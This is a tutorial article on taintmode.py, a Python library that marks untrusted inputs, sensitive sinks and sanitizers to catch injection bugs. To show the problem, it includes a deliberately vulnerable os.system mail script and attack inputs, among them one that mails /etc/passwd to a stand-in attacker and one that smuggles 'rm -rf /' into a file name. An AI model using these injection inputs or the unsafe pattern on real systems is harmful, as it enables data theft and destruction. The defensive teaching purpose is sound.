--------------------
Taint Mode in Python
--------------------
.. class:: endnote

+-------------------------------------------+-------------------------------------------+
| .. image:: ../taint/juanjodetraje.jpg     |**Author:** Juanjo Conti                   |
|    :class: right foto                     |                                           |
|                                           |Juanjo is an Information Systems Engineer. |
|                                           |He has been coding in Python for the last  |
|                                           |5 years and uses it for work, research and |
|                                           |fun.                                       |
|                                           |                                           |
|                                           |**Blog:** http://juanjoconti.com.ar        |
|                                           |                                           |
|                                           |**Email:** jjconti@gmail.com               |
|                                           |                                           |
|                                           |**Twitter:** @jjconti                      |
+-------------------------------------------+-------------------------------------------+

This article is based on the paper *A Taint Mode for Python via a Library*, which I wrote
with Dr. Alejandro Russo from Chalmers University of Technology, Gothenburg, Sweden,
and which was presented at the OWASP App Sec Research 2010 conference.

Opening words
-------------
Vulnerabilities in web applications are a threat to online systems.
SQL injection and cross-site scripting attacks are among the most common
threats today, and they are often the result of improper or missing input
validation. To help discover such vulnerabilities, popular web scripting
languages like Perl, Ruby, PHP and Python perform taint analysis.
Such analysis is often implemented as an execution monitor, where the
interpreter needs to be adapted to provide a taint mode.

However, modifying an interpreter can be a major task in its own right,
and it is very likely that each new release of the interpreter will have
to be adapted again to keep providing a taint mode.

Unlike previous approaches, taintmode.py provides taint analysis for Python
via a library written entirely in Python, thus avoiding modifications to
the interpreter. Classes, decorators and dynamic dispatch make our solution
lightweight, easy to use, and particularly neat. With little or no effort,
the library can be adapted to work with different Python interpreters.

Taint Analysis concepts
-----------------------
First, let's talk about the basic concepts:
**Untrusted Sources**. Untrusted data is marked as tainted.
Examples of this are: any data received as a GET or POST parameter,
HTTP headers and AJAX requests. One may also consider marking data from
a persistence layer as tainted. A database may have been tampered with
outside the application, or the data could have been intercepted and
modified in transit.

**Sensitive Sinks** are those points in the system that unvalidated data
must not reach, because an attack can be hidden in that data.
Some examples of sensitive sinks are the browser or an HTML template engine;
the SQL, OS or LDAP interpreters; or even the Python interpreter itself.

The third element is the sanitization methods; they let us
escape, encode or validate input data to make it fit to be sent to
a given sink. An example of a sanitization function is Python's cgi.escape:

.. code-block:: pycon

    >>> import cgi
    >>> cgi.escape("<script>alert('this is an attack')</script>")
    "&lt;script&gt;alert('this is an attack')&lt;/script&gt;"

How to use it?
--------------
This example is deliberately simple, so that we can focus on the concepts
rather than on the problem being solved:

.. code-block:: python

    import sys
    import os

    def get_data(args):
        # args[0] is the script name; the next two are the user's input
        return args[1], args[2]

    usermail, file = get_data(sys.argv)

    # Both values are pasted into a shell command without any validation
    cmd = 'mail -s "Requested file" ' + usermail + ' < ' + file
    os.system(cmd)

The script receives an email address and a file name as command-line arguments
and, as a result, mails the file to that address.

The problem with this application is that its author did not consider
other ways an attacker could invoke it. Some examples:

.. code-block:: bash

    python email.py alice@domain.se ./reportJanuary.xls
    python email.py devil@evil.com '/etc/passwd'
    python email.py devil@evil.com '/etc/passwd ; rm -rf / '


The first example is the intended use of the application, the one the
programmer had in mind when writing it. The second one shows the first
vulnerability: an attacker can mail themselves the contents of /etc/passwd.
The third example is even worse: the attacker not only steals sensitive
system information but also erases the system's files. Of course, whether
this scenario succeeds depends on how the server is configured and on the
privileges the application runs with, but you get the idea.

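
To see why the third invocation is dangerous, it helps to build the command
string without running it. The sketch below (Python 3) reuses the concatenation
from the script and prints what the shell would receive; nothing is executed.
Splitting on the semicolon is only a rough illustration, not real shell parsing:

.. code-block:: python

    # Build (but do not run) the command for the third invocation
    usermail = "devil@evil.com"
    filename = "/etc/passwd ; rm -rf / "

    cmd = 'mail -s "Requested file" ' + usermail + ' < ' + filename
    print(cmd)

    # The shell treats ';' as a command separator, so this single string
    # holds two commands: the mail invocation and the injected one.
    first, second = [part.strip() for part in cmd.split(";")]
    print(first)
    print(second)
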
So, how can the library help the programmer become aware of these problems
and fix them? The first step is to import the library's components and mark
the sensitive sinks and untrusted sources. The modified version of the program is:

.. code-block:: python

    import sys
    import os
    from taintmode import untrusted, ssink, cleaner, OSI

    os.system = ssink(OSI)(os.system)

    @untrusted
    def get_data(args):
        return [args[1], args[2]]

    usermail, filename = get_data(sys.argv)

    cmd = 'mail -s "Requested file" ' + usermail + ' < ' + filename
    os.system(cmd)


Note that we need to mark the get_data function as an untrusted source
(with the untrusted decorator) and os.system as a sink sensitive to
Operating System Injection (OSI) attacks.

Now, when we try to run the program (whether or not we are attempting
an attack), we get this message on standard output:

.. code-block:: bash

    $ python email.py jjconti@gmail.com myNotes.txt
    ===============================================================================
    Violation in line 14 from file email.py
    Tainted value: mail -s "Requested file" jjconti@gmail.com < myNotes.txt
    -------------------------------------------------------------------------------
        usermail, filename = get_data(sys.argv)
        cmd = 'mail -s "Requested file" ' + usermail + ' < ' + filename
    --> os.system(cmd)
    ===============================================================================


The library intercepts the execution just before the untrusted data reaches the
sensitive sink and reports it. The next step is to add a cleaning function that
sanitizes the input data:

.. code-block:: python

    import sys
    import os
    from taintmode import untrusted, ssink, cleaner, OSI
    from cleaners import clean_osi

    clean_osi = cleaner(OSI)(clean_osi)
    os.system = ssink(OSI)(os.system)

    @untrusted
    def get_data(args):
        return [args[1], args[2]]

    usermail, filename = get_data(sys.argv)
    usermail = clean_osi(usermail)
    filename = clean_osi(filename)

    cmd = 'mail -s "Requested file" ' + usermail + ' < ' + filename
    os.system(cmd)

In this final example we import clean_osi, a function capable of cleaning
input data against OSI attacks, and on the next line we mark it as
a cleaner for that kind of attack (the library requires this).
Finally, we use the function to clean the program's inputs. If we execute
the program now, it runs normally.

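
The article does not show what clean_osi looks like inside. As a rough idea of
what such a cleaner might do, here is a minimal sketch for Python 3 built on
shlex.quote from the standard library. The name quote_for_shell is made up for
this example and is not part of the library or of the cleaners module:

.. code-block:: python

    import shlex

    def quote_for_shell(value):
        """Hypothetical OSI cleaner: quote value so the shell reads it as one word."""
        return shlex.quote(value)

    # A harmless value is returned unchanged
    print(quote_for_shell("alice@domain.se"))

    # Once quoted, the ';' no longer acts as a command separator
    print(quote_for_shell("/etc/passwd ; rm -rf / "))

Quoting only stops the injected command from running. Deciding whether the
caller may read a given file, as in the second attack, needs a separate check.
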
How does it work?
-----------------
The library uses ids for the different vulnerabilities you are working with;
these are called tags. It also provides decorators to mark different
parts of the program (classes, methods or functions) as any of the
three elements mentioned in the section about Taint Analysis.
untrusted
~~~~~~~~~
untrusted is a decorator that indicates that the values returned by a function
or method are not to be trusted. Untrusted values may carry any kind of attack,
so they are marked as tainted with every kind of stain.

If you have access to the function or method definition, for example if it's part
of your codebase, the decorator can be applied using Python's syntactic sugar:

.. code-block:: python

    @untrusted
    def from_the_outside():
        ...

When using third-party modules, we can still apply the decorator. The next
example is from a program written using the web.py framework:

.. code-block:: python

    import web
    web.input = untrusted(web.input)

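
To give an idea of what a decorator like untrusted has to do, here is a minimal
sketch for Python 3. It is not the library's code: TaintedStr, ALL_TAGS and
untrusted_sketch are names invented for this example, and only str values
(alone or inside a list or tuple) are handled:

.. code-block:: python

    import functools

    # Tag names taken from the article; the set itself is an assumption
    ALL_TAGS = frozenset({"XSS", "SQLI", "OSI", "II"})

    class TaintedStr(str):
        """str subclass that carries a set of taint tags (illustrative only)."""
        def __new__(cls, value, taints=ALL_TAGS):
            obj = super().__new__(cls, value)
            obj.taints = set(taints)
            return obj

    def untrusted_sketch(func):
        """Wrap func so that every str it returns is tainted with all tags."""
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            result = func(*args, **kwargs)
            if isinstance(result, str):
                return TaintedStr(result)
            if isinstance(result, (list, tuple)):
                return type(result)(
                    TaintedStr(x) if isinstance(x, str) else x for x in result
                )
            return result
        return wrapper

    @untrusted_sketch
    def get_data(args):
        return [args[1], args[2]]

    usermail, filename = get_data(["email.py", "alice@domain.se", "report.xls"])
    print(usermail, sorted(usermail.taints))
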
ssink
~~~~~
The ssink decorator must be used to mark those functions or methods that we
don't want tainted values to reach. We call them sensitive sinks.
Each sink is sensitive to one kind of vulnerability, which must be specified when
the decorator is used.

For example, Python's eval function is a sink sensitive to Interpreter
Injection attacks. We mark it as such like this:

.. code-block:: python

    eval = ssink(II)(eval)

The web.py framework offers examples of sinks sensitive to SQL Injection:

.. code-block:: python

    import web
    db = web.database(dbn="sqlite", db=DB_NAME)
    db.delete = ssink(SQLI)(db.delete)
    db.select = ssink(SQLI)(db.select)
    db.insert = ssink(SQLI)(db.insert)


Like the other decorators, if the sensitive sink is defined in our own code, we can
use syntactic sugar:

.. code-block:: python

    @ssink(XSS)
    def render_answer(input):
        ...

The decorator can also be used without specifying a vulnerability. In this case,
the sink is marked as sensitive to every kind of vulnerability, although this is not
a very common use case:

.. code-block:: python

    @ssink()
    def very_sensitive(input):
        ...

When an X-tainted value reaches an X-sensitive sink, we are facing
a vulnerability and an appropriate mechanism is triggered.

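
The check a sink has to perform can be sketched in a few lines of Python 3.
This is an illustration under stated assumptions, not the library's
implementation: TaintedStr, TaintViolation and ssink_sketch are invented names,
and the sketch raises an exception where the library prints a report:

.. code-block:: python

    import functools

    class TaintedStr(str):
        """str subclass that carries a set of taint tags (illustrative only)."""
        def __new__(cls, value, taints=()):
            obj = super().__new__(cls, value)
            obj.taints = set(taints)
            return obj

    class TaintViolation(Exception):
        """Hypothetical error raised when a tainted value reaches a sink."""

    def ssink_sketch(tag):
        """Mark a function as a sink that is sensitive to the given tag."""
        def decorator(func):
            @functools.wraps(func)
            def wrapper(*args, **kwargs):
                for value in list(args) + list(kwargs.values()):
                    # Plain values have no 'taints' attribute and pass through
                    if tag in getattr(value, "taints", ()):
                        raise TaintViolation(
                            f"{tag}-tainted value reached {func.__name__}: {value!r}"
                        )
                return func(*args, **kwargs)
            return wrapper
        return decorator

    @ssink_sketch("XSS")
    def render_answer(text):
        return "<p>" + text + "</p>"

    print(render_answer("hello"))
    try:
        render_answer(TaintedStr("<script>", taints={"XSS"}))
    except TaintViolation as exc:
        print("blocked:", exc)
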
cleaner
~~~~~~~
cleaner is a decorator used to declare that a method or function is able to clean
stains from a value.

For example, the plain_text function removes HTML code from its input and returns
the new clean value:

.. code-block:: python

    >>> plain_text("This is <b>bold</b>")
    'This is bold'
    >>> plain_text("<a href='...'>Click here</a>")
    'Click here'


Functions of this kind are tied to a specific kind of vulnerability,
so the right way to use the cleaner decorator is to specify the kind of stain.
Again, there are two ways of doing it. In the definition:

.. code-block:: python

    @cleaner(XSS)
    def plain_text(input):
        ...

or before we start using the function in our program:

.. code-block:: python

    plain_text = cleaner(XSS)(plain_text)

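
A cleaner has to do the opposite of a source: remove one tag and leave the
others in place. The following Python 3 sketch shows the idea. TaintedStr and
cleaner_sketch are invented names, and the regular expression is a naive tag
stripper used for illustration only, not a robust HTML sanitizer:

.. code-block:: python

    import functools
    import re

    class TaintedStr(str):
        """str subclass that carries a set of taint tags (illustrative only)."""
        def __new__(cls, value, taints=()):
            obj = super().__new__(cls, value)
            obj.taints = set(taints)
            return obj

    def cleaner_sketch(tag):
        """Mark a function as able to remove the given tag from its input."""
        def decorator(func):
            @functools.wraps(func)
            def wrapper(value, *args, **kwargs):
                result = func(value, *args, **kwargs)
                # Keep every taint of the input except the one being cleaned
                remaining = set(getattr(value, "taints", ())) - {tag}
                return TaintedStr(result, taints=remaining)
            return wrapper
        return decorator

    @cleaner_sketch("XSS")
    def plain_text(text):
        return re.sub(r"<[^>]*>", "", text)

    dirty = TaintedStr("This is <b>bold</b>", taints={"XSS", "SQLI"})
    clean = plain_text(dirty)
    print(clean, sorted(clean.taints))
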
Taint aware
~~~~~~~~~~~
One of the main parts of the library takes care of tracking taint information
for built-in classes (like int or str). The library dynamically defines subclasses
of these classes, adding an attribute that allows that tracking; for each object
the attribute holds the set of tags representing the taints the object has at a
given moment of the execution. An object is considered untainted when its tag set
is empty. In the context of the library, these subclasses are called
*taint-aware classes*. The methods inherited from the built-in classes are redefined
so that they propagate the taint information.

For example, if a and b are tainted objects, c will have the union of
the taints of both:

.. code-block:: python

    c = a.action(b)

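
For one concrete action, string concatenation, the propagation rule can be
sketched as follows in Python 3. The class below is written by hand for
illustration; the library generates its taint-aware classes dynamically, and
the name TaintedStr is an assumption of this example:

.. code-block:: python

    class TaintedStr(str):
        """str subclass whose '+' keeps the union of both operands' taints."""
        def __new__(cls, value, taints=()):
            obj = super().__new__(cls, value)
            obj.taints = set(taints)
            return obj

        def _merge(self, other):
            # Plain strings have no 'taints' attribute and add nothing
            return self.taints | set(getattr(other, "taints", ()))

        def __add__(self, other):
            return TaintedStr(str.__add__(self, other), self._merge(other))

        def __radd__(self, other):
            # Called for plain + tainted, so a literal on the left
            # does not wash the taints away
            return TaintedStr(str.__add__(other, self), self._merge(other))

    a = TaintedStr("SELECT * FROM t WHERE id=", taints={"SQLI"})
    b = TaintedStr("42", taints={"XSS"})

    c = a + b
    d = "prefix " + a
    print(sorted(c.taints))
    print(sorted(d.taints))
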
Present state
-------------
In this brief article I have presented the main features of the library.
To learn about more advanced features and implementation details, you can
visit http://www.juanjoconti.com.ar/taint/

More information & links
------------------------
* OWASP App Sec 2010: http://alturl.com/5u94e
* OWASP: http://www.owasp.org
* Python security: http://www.pythonsecurity.org